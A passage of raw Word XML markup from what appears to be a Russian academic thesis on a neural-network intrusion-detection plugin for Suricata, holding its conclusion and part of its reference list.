        <w:t xml:space="preserve">. Плагин успешно выявил атаки типа сетевой разведки, перебора паролей по SSH, отказа в обслуживании, SQL-инъекций, нарушения контроля доступа, перебора директорий и ряда других. </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Единственным необнаруженным сценарием стала SSRF-атака через единичный HTTP-запрос — фундаментальное ограничение подхода на основе анализа метаданных потоков, характерное для всех систем данного класса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E6EED" w14:textId="77777777" w:rsidR="009D7303" w:rsidRPr="009D7303" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнительный анализ показал, что нейросетевой и сигнатурный подходы являются взаимодополняющими. Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечивает высокую точность для известных угроз с минимальным числом ложных срабатываний, тогда как нейросетевой плагин расширяет покрытие на поведенческие аномалии и угрозы без формализованных сигнатур. Совместное применение обоих подходов позволяет существенно повысить общую эффективность системы обнаружения вторжений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B42E6" w14:textId="3AB69DFD" w:rsidR="008E0171" w:rsidRPr="00402025" w:rsidRDefault="009D7303" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Практическая значимость работы подтверждается успешным развёртыванием и тестированием комплекса на операционной системе «РЕД ОС», что подтверждает применимость разработанного решения в отечественной инфраструктуре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06823AFD"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4D1DAFAF"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06E9BA20"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4F96002B"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48914158"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0784B100"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08871349"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40FB9988"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0F3DD139"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519030E0"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23AFF1EB"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2FE09778"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561F9AED" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00402025" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A53182" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C356983" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009D7303">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11692584" w14:textId="7F22B1C3" w:rsidR="008E0171" w:rsidRPr="009D45A4" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc230947687"/>
      <w:bookmarkStart w:id="27" w:name="_Toc231673295"/>
      <w:r w:rsidRPr="009D45A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Список </w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="009D45A4">
        <w:t xml:space="preserve">использованной </w:t>
      </w:r>
      <w:r w:rsidRPr="009D45A4">
        <w:t>литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="2AFDB966" w14:textId="77777777" w:rsidR="0099286E" w:rsidRPr="008D5BC0" w:rsidRDefault="0099286E" w:rsidP="00CE4D59">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCCAE89" w14:textId="77777777"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Документация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — официальная документация по настройке и формату EVE JSON: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Электронный ресурс].</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 2024. — URL: https://docs.suricata.io/ (дата обращения: 21.03.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650A9D2" w14:textId="77777777"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Федеральный закон от 27.07.2006 № 149-ФЗ «Об информации, информационных технологиях и о защите информации» [Электронный ресурс]. — URL: https://www.consultant.ru/document/cons_doc_LAW_61798/ (дата обращения: 12.01.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F8DEA" w14:textId="77777777"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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[Электронный ресурс]. — URL: https://fstec.ru/normotvorcheskaya/akty/53-prikazy/691 (дата обращения: 12.01.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214445CB" w14:textId="78320CC8"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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 [Электронный ресурс]. — URL: </w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://fstec.ru/normotvorcheskaya/akty/53prikazy/80</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(дата</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обращения:</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533632EB" w14:textId="77777777"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Банк данных угроз безопасности информации ФСТЭК России [Электронный ресурс]. — </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bdu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fstec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/ (дата обращения: 20.01.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C47B9" w14:textId="77777777"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Методика определения актуальных угроз безопасности персональных данных при их обработке в информационных системах персональных данных. Утверждена ФСТЭК России 14.02.2008 [Электронный ресурс]. — URL: https://fstec.ru/component/attachments/download/290 (дата обращения: 20.01.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466862B1" w14:textId="77777777"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ahmed M., Khan S. Limitations of Signature-Based Detection Systems and Advanced Evasion Techniques // Journal of Cybersecurity and Privacy. — 2022. — Vol. 3, No. 2. — P. 187–202. — DOI: 10.3390/jcp3020018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EFC04" w14:textId="66D4BD75"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Liao H., Richard Lin C., Lin Y., Tung K. Intrusion detection system: A comprehensive review // Journal of Network and Computer Applications. — 2019. — Springer Nature. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://link.springer.com/article/10.1186/s42400-019-0038</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC3AE5" w14:textId="10B1387C" w:rsidR="008D5BC0"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Методика оценки угроз безопасности информации. Утверждена ФСТЭК</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>России</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>05.02.2021</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс].</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> U</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RL:</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://fstec.ru/tekhnicheskaya-zashchita informatsii/dokumenty/metodicheskie-dokumenty/metodika-otsenki-ugroz-bezopasnosti-informatsii</w:t>
      </w:r>
      <w:r w:rsidR="008D5BC0" w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(дата обращения: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200FDE69" w14:textId="08D568F5"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ONNX</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Neural</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Электронный ресурс]. — </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
